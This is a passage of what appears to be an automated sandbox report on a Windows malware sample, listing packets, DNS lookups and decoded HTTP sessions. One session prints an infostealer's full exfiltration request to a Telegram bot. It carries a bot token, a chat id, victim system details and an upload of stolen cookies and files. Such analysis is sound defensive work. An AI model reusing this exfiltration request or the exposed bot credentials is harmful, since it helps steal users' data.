                            Jul 29, 2024 07:38:56.886470079 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886487961 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886589050 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886604071 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886648893 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886671066 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886701107 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886737108 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886821032 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886840105 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886862040 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886876106 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886895895 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886909962 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886921883 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886936903 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886985064 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887006998 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887027025 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887052059 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.887073994 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887123108 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887154102 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887171984 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887191057 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887208939 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887234926 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887254953 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887285948 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.887365103 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887377024 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.887396097 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887418985 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887439013 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887512922 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887535095 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887553930 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.887624979 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887655973 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.887847900 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.899955034 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.899974108 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900058985 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.900080919 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900120974 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900146961 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.900173903 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.900219917 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900234938 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900373936 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.900393009 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900490999 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.904902935 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.904921055 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.904994011 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905023098 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905087948 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905111074 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905141115 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905184031 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905208111 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905577898 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905627012 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905653954 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905689955 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905731916 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905750990 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905925035 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905965090 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905998945 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906028032 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906042099 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906078100 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.906092882 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.906173944 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906213999 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.906229019 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.906255960 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906299114 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.910327911 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.910381079 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.910475016 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.910487890 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.910569906 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.910597086 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.910655975 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.915122032 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:58.166621923 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:58.166810036 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:58.167052984 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:58.168867111 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:58.168894053 CEST44360284149.154.167.220192.168.2.8

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 29, 2024 07:38:00.853925943 CEST5603353192.168.2.81.1.1.1
                            Jul 29, 2024 07:38:00.860754967 CEST53560331.1.1.1192.168.2.8
                            Jul 29, 2024 07:38:36.526825905 CEST5636653192.168.2.81.1.1.1
                            Jul 29, 2024 07:38:36.650335073 CEST53563661.1.1.1192.168.2.8
                            Jul 29, 2024 07:38:43.032110929 CEST5355821162.159.36.2192.168.2.8
                            Jul 29, 2024 07:38:43.934698105 CEST53611091.1.1.1192.168.2.8
                            Jul 29, 2024 07:38:56.102005959 CEST6365153192.168.2.81.1.1.1
                            Jul 29, 2024 07:38:56.108771086 CEST53636511.1.1.1192.168.2.8

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 29, 2024 07:38:00.853925943 CEST192.168.2.81.1.1.10x726bStandard query (0)ipwho.isA (IP address)IN (0x0001)false
                            Jul 29, 2024 07:38:36.526825905 CEST192.168.2.81.1.1.10x2e89Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                            Jul 29, 2024 07:38:56.102005959 CEST192.168.2.81.1.1.10x188aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 29, 2024 07:38:00.860754967 CEST1.1.1.1192.168.2.80x726bNo error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                            Jul 29, 2024 07:38:36.650335073 CEST1.1.1.1192.168.2.80x2e89No error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                            Jul 29, 2024 07:38:56.108771086 CEST1.1.1.1192.168.2.80x188aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • api.telegram.org
                            • ipwho.is

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.849705195.201.57.90807552C:\Users\user\Desktop\765iYbgWn9.exe
                            TimestampBytes transferredDirectionData
                            Jul 29, 2024 07:38:00.870285988 CEST59OUTGET /?output=json HTTP/1.1
                            accept: */*
                            host: ipwho.is
                            Jul 29, 2024 07:38:01.523041964 CEST950INHTTP/1.1 200 OK
                            Date: Mon, 29 Jul 2024 05:38:01 GMT
                            Content-Type: application/json; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Server: ipwhois
                            Access-Control-Allow-Headers: *
                            X-Robots-Tag: noindex
                            Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                            Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:38:01-04:00"}}0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.849708195.201.57.90807552C:\Users\user\Desktop\765iYbgWn9.exe
                            TimestampBytes transferredDirectionData
                            Jul 29, 2024 07:38:36.658557892 CEST59OUTGET /?output=json HTTP/1.1
                            accept: */*
                            host: ipwho.is
                            Jul 29, 2024 07:38:37.310988903 CEST950INHTTP/1.1 200 OK
                            Date: Mon, 29 Jul 2024 05:38:37 GMT
                            Content-Type: application/json; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Server: ipwhois
                            Access-Control-Allow-Headers: *
                            X-Robots-Tag: noindex
                            Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                            Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:38:37-04:00"}}0


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.860284149.154.167.2204437552C:\Users\user\Desktop\765iYbgWn9.exe
                            TimestampBytes transferredDirectionData
                            2024-07-29 05:38:56 UTC1232OUTPOST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20Y7SLS%20(1280,%201024)%0AHWID:%205205123305035030%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookie [TRUNCATED]
                            content-type: multipart/form-data; boundary=35ae211d349cb1f4-a77385f923c3c626-0e46c70059d2a17c-d7d54ebd8b6b92dd
                            content-length: 938035
                            accept: */*
                            host: api.telegram.org
                            2024-07-29 05:38:56 UTC15152OUTData Raw: 2d 2d 33 35 61 65 32 31 31 64 33 34 39 63 62 31 66 34 2d 61 37 37 33 38 35 66 39 32 33 63 33 63 36 32 36 2d 30 65 34 36 63 37 30 30 35 39 64 32 61 31 37 63 2d 64 37 64 35 34 65 62 64 38 62 36 62 39 32 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 38 2e 34 36 2e 31 32 33 2e 33 33 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 64 37 fd 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 64 37 fd 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00
                            Data Ascii: --35ae211d349cb1f4-a77385f923c3c626-0e46c70059d2a17c-d7d54ebd8b6b92ddContent-Disposition: form-data; name="document"; filename="[US]_8.46.123.33.zip"Content-Type: application/zipPKd7XAutofill/PKd7X
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 48 42 12 00 b6 b1 4d 6b 23 51 20 54 51 18 a7 30 8d 70 00 89 2d 24 03 81 dd b0 85 dd b0 85 dd 90 84 24 24 01 20 09 db dc 2f 10 00 92 b8 9f 6d 6c 03 50 6b 4f 66 12 11 48 62 1c 47 32 93 88 40 12 11 01 40 66 02 20 09 49 d8 66 9a 26 aa 02 00 db 64 26 b6 01 88 08 22 82 cc 24 22 90 c4 fd 24 d1 5a a3 b5 06 80 24 22 2a 11 20 15 32 27 32 c1 6e 74 a5 a7 b5 11 08 22 40 2a b4 36 22 15 4a 11 d3 34 01 20 09 00 db dc 4f 12 b6 91 84 6d 5a 6b 00 94 52 90 84 6d 5a 6b 94 52 18 c7 11 49 2c 16 0b 6c 33 8e 23 11 81 24 6c 93 99 d8 26 22 88 08 32 93 69 9a a8 11 48 02 40 12 00 b6 01 b0 8d 6d 22 82 5a 2b e3 38 02 d0 75 1d d3 34 91 99 84 2a 92 88 08 00 5a 6b b4 d6 00 28 a5 50 6b 65 9a 26 6c 23 09 db b4 d6 00 28 a5 20 89 fb 49 02 20 33 01 90 44 ad 95 cc 24 33 c9 4c ee 27 09 00 db 44
                            Data Ascii: HBMk#Q TQ0p-$$$ /mlPkOfHbG2@@f If&d&"$"$Z$"* 2'2nt"@*6"J4 OmZkRmZkRI,l3#$l&"2iH@m"Z+8u4*Zk(Pke&l#( I 3D$3L'D
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 5e 24 e2 85 b3 cd 0b 62 1b 49 00 d8 e6 81 6c 03 50 10 2f 8c cc 73 b0 cd 0b 63 9b e7 47 12 0f 64 1b 00 99 e7 61 1b 00 db d8 26 22 00 b0 8d 6d 24 01 60 9b 07 92 c4 73 93 cd 03 d9 e6 81 4a 29 d8 c6 36 00 b6 91 c4 fd 02 71 3f db 3c 37 49 d8 c6 36 b6 91 04 80 6d 00 94 46 12 92 90 04 80 6d 6c 63 1b 49 00 48 c2 36 00 b6 91 04 80 33 91 04 80 24 1e c8 36 32 97 d9 c6 36 92 88 08 6c d3 5a 43 12 f7 93 c4 0b 62 1b 00 49 dc cf 36 b6 89 08 00 a6 69 02 a0 d6 0a 40 66 52 10 92 00 c8 4c 6c 23 09 00 db 94 52 18 c7 91 88 a0 94 c2 34 4d 00 94 52 b0 8d 24 6c 63 1b 00 49 00 d8 06 a0 22 6c 63 1b 80 88 40 12 b6 b1 4d 66 62 1b 00 49 3c 50 44 00 60 9b cc 04 40 12 92 b8 9f 6d 24 21 09 49 d8 c6 36 b6 b1 4d 66 22 09 49 48 e2 b9 c9 01 80 24 6c 63 1b 00 49 48 c2 2d 91 84 24 6c 93 99 d8
                            Data Ascii: ^$bIlP/scGda&"m$`sJ)6q?<7I6mFmlcIH63$626lZCbI6i@fRLl#R4MR$lcI"lc@MfbI<PD`@m$!I6Mf"IH$lcIH-$l
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 24 91 99 d8 46 12 11 81 e2 fb d7 b6 cd f3 23 89 e4 85 93 c4 fd 6c 73 bf 2f 3d fe d7 bc d2 ce c0 62 63 93 88 e0 5f 6b 18 47 2e 5c bc c4 fe e1 21 2f cc 40 e1 12 0b 0e dd f1 6d ab 47 f1 f4 b6 c5 03 d9 e6 85 11 2f 1a db 00 48 e2 7e b6 f9 97 48 e2 85 f9 8a 47 fd 39 1f 7d f3 df 22 05 d8 e0 04 12 9c 80 71 ec b0 3c f1 6e 3c b7 69 9a a8 b5 f2 40 e5 b3 3e 09 7f de 97 01 f0 b4 a7 df ca f1 e3 c7 59 2c 16 cc 66 33 4a bb 0f d7 6b b8 df 1f dc be cf 1b fe fe 82 14 2f 9c cd 0b 13 98 17 c6 36 ff 11 3e f9 49 9f cf e7 7c de 17 f2 df e9 b3 3e e3 53 f9 e2 87 7f 06 ff 99 6c f3 40 c1 73 b2 0d 80 24 24 d1 6c 9e db a7 3c f5 f3 f9 9c cf fb 42 fe 3b 7d d6 67 7c 2a 5f fc d0 4f e3 5f 22 f3 1c 6c f3 9f c5 36 cf 4d e6 3f 94 6d fe 35 c2 bc c8 6c f3 40 b6 91 c4 bf 87 78 e1 6c f3 42 39 78
                            Data Ascii: $F#ls/=bc_kG.\!/@mG/H~HG9}"q<n<i@>Y,f3Jk/6>I|>Sl@s$$l<B;}g|*_O_"l6M?m5l@xlB9x
                            2024-07-29 05:38:56 UTC16384OUTData Raw: c6 93 3f e9 c5 78 38 cf 74 cf 5f f2 6a 5f f4 44 fe 70 e3 18 6c 1c 07 e0 03 df ea 55 f9 96 fc 75 f4 5d 67 e1 f4 83 e0 f4 2d 00 70 ee 36 78 d0 cd f8 3d 6f e6 7e 4f f9 c5 1f e3 91 bf 9c 00 98 5b f8 c5 af 7d 15 de 84 67 fb a5 6f ff 16 de ec 6f 8e c1 c6 31 00 7c 04 5f fd 69 6f c2 47 5d c7 15 f7 fc 25 af f6 b1 bf ce 8b 7f d4 27 f2 09 e7 7f 8c 47 fe ce 16 9c 7e 10 00 be e9 24 7e f4 df a3 cf 3e cf 2f fe cc 4b f0 d3 ef ff 7b 7c eb 62 07 80 57 7d 8b 37 e3 0f de 70 87 67 f9 9b 3f 40 3f 70 09 96 97 80 5b f8 c5 af bb 9e 9f 7e bf 5f e5 db 0c e6 e1 fc e2 77 be 1c 4f fa ac 1f e1 63 96 b7 c0 a9 07 c1 a9 9b 79 be 96 7b 70 ee 36 fc 90 9b f1 7b df 0c 00 3c 89 0f 7a 97 9f e2 5b 8f 1e cc 2f fe cc 3b f1 26 3c db 53 7e e5 17 79 c4 8f f4 fc e2 77 be 3e 6f c2 fd ce f3 35 9f f5 63
                            Data Ascii: ?x8t_j_DplUu]g-p6x=o~O[}goo1|_ioG]%'G~$~>/K{|bW}7pg?@?p[~_wOcy{p6{<z[/;&<S~yw>o5c
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 64 26 00 11 81 6d 6c 13 11 00 c8 3c 0f db 48 22 33 b1 8d 24 24 01 60 1b 80 d6 1a 11 41 44 20 89 cc c4 36 f7 b3 85 24 22 02 00 db d8 46 12 92 08 27 99 09 80 24 00 6c 03 10 11 d8 c6 36 00 92 00 b0 0d 80 24 1e 28 33 b1 0d 40 44 20 89 d6 1a 00 92 78 7e 6c 53 4a 41 86 d6 1a 00 11 01 40 6b 8d 88 4a 66 02 50 6b 45 12 ad 35 6c 13 11 b4 d6 90 04 80 6d 00 22 02 80 cc c4 36 11 41 44 60 1b db 00 d8 26 33 a9 0a ee 27 09 00 49 dc 6f 9a 26 22 82 52 0a 00 d3 34 31 4d 13 a5 14 ba ae 63 9a 26 24 21 09 db 00 48 42 12 00 99 c9 03 d9 46 12 00 92 88 08 32 13 db 00 48 22 33 b1 0d 40 44 20 09 db d8 c6 36 92 88 08 24 81 4d 66 02 50 4a c1 36 d3 34 01 50 4a c1 6e d8 06 20 22 00 b0 0d 40 44 30 8e 23 92 88 08 22 02 49 d8 26 33 c9 4c 22 2a b6 79 7e 6c 23 09 00 49 3c 37 49 90 c6 36 00
                            Data Ascii: d&ml<H"3$$`AD 6$"F'$l6$(3@D x~lSJA@kJfPkE5lm"6AD`&3'Io&"R41Mc&$!HBF2H"3@D 6$MfPJ64PJn "@D0#"I&3L"*y~l#I<7I6
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 71 3f db 88 1f 58 9a ff 4c 36 ff 1e 32 ff ad 6c f3 c2 c8 fc bb 58 fc 9b 48 02 40 12 b6 01 b0 0d 36 48 fc 47 91 c4 0b 17 bc 30 b6 01 90 c4 fd 6c 03 80 0d 11 60 f3 02 49 bc 30 41 01 40 12 92 00 90 84 24 00 32 13 db d8 c6 36 b6 c1 e6 d9 92 07 92 79 0e b2 79 7e 64 ae 08 63 9b 07 b2 cd 73 93 79 be 2c fe c3 d9 e6 7e 32 ff a1 6c f3 40 92 b8 9f 6d fe b5 82 e7 64 9b ff 4e b6 f9 d7 90 f9 0f 65 9b 7f 0d 99 17 99 6d 9e 83 0d 12 ff 1e 61 5e 28 db bc 30 b6 79 61 42 e2 7e b6 f9 af 66 9b 17 26 1c fc 7b d8 06 40 12 0f 64 9b 17 85 cc 73 b0 cd 8b ca 36 92 78 61 e4 00 c0 36 ff 51 6c 73 bf 30 ff 2a b6 f9 b7 90 79 be 6c f3 c2 c8 e6 3f 9a 6d 5e 54 32 2f 12 db fc 5b c8 bc 50 99 c9 0b 13 fc cb 6c 73 3f 49 dc cf 36 92 78 20 db 3c 90 cc bf 9a 6d c2 3c 0f db fc 6b c9 5c 66 1b 49 3c
                            Data Ascii: q?XL62lXH@6HG0l`I0A@$26yy~dcsy,~2l@mdNema^(0yaB~f&{@ds6xa6Qls0*yl?m^T2/[Pls?I6x <m<k\fI<
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 92 b8 5f 18 6c 03 60 1b db d8 a6 ef 7b 32 93 d6 1a b6 89 08 24 01 90 99 48 22 33 89 08 4a 29 00 4c d3 84 6d 4a 29 b4 d6 88 08 00 32 13 80 88 40 12 b6 69 ad 11 11 44 04 00 b6 b1 8d 24 24 81 4d 44 60 9b d6 1a b6 89 08 00 6c 23 09 49 dc cf 36 b6 b9 9f 6d 24 01 20 09 49 00 48 02 40 12 ad 35 5a 6b 00 94 52 88 08 ee e7 96 64 26 92 a8 b5 02 30 4d 13 b6 89 08 86 f5 9a ae ef a9 b5 92 99 4c d3 04 40 df f7 d4 5a 59 2e 97 48 e2 81 6c 13 11 44 04 b6 b1 8d 6d 24 11 11 00 64 26 ad 35 4a 29 dc cf 36 b6 01 90 84 24 6c d3 5a c3 36 b5 56 00 32 13 80 88 20 33 b1 4d 44 10 11 d8 a6 b5 06 80 24 94 46 12 92 b0 8d 6d 00 24 11 11 d8 46 12 b6 99 a6 09 49 d4 5a b1 cd 34 4d 74 5d 47 6b 0d db 94 52 90 84 6d 9e 09 e9 07 57 06 b0 cd 03 49 02 c0 36 2f 12 1b 30 64 82 13 9c fc 47 08 73 99
                            Data Ascii: _l`{2$H"3J)LmJ)2@iD$$MD`l#I6m$ IH@5ZkRd&0ML@ZY.HlDm$d&5J)6$lZ6V2 3MD$Fm$FIZ4Mt]GkRmWI6/0dGs
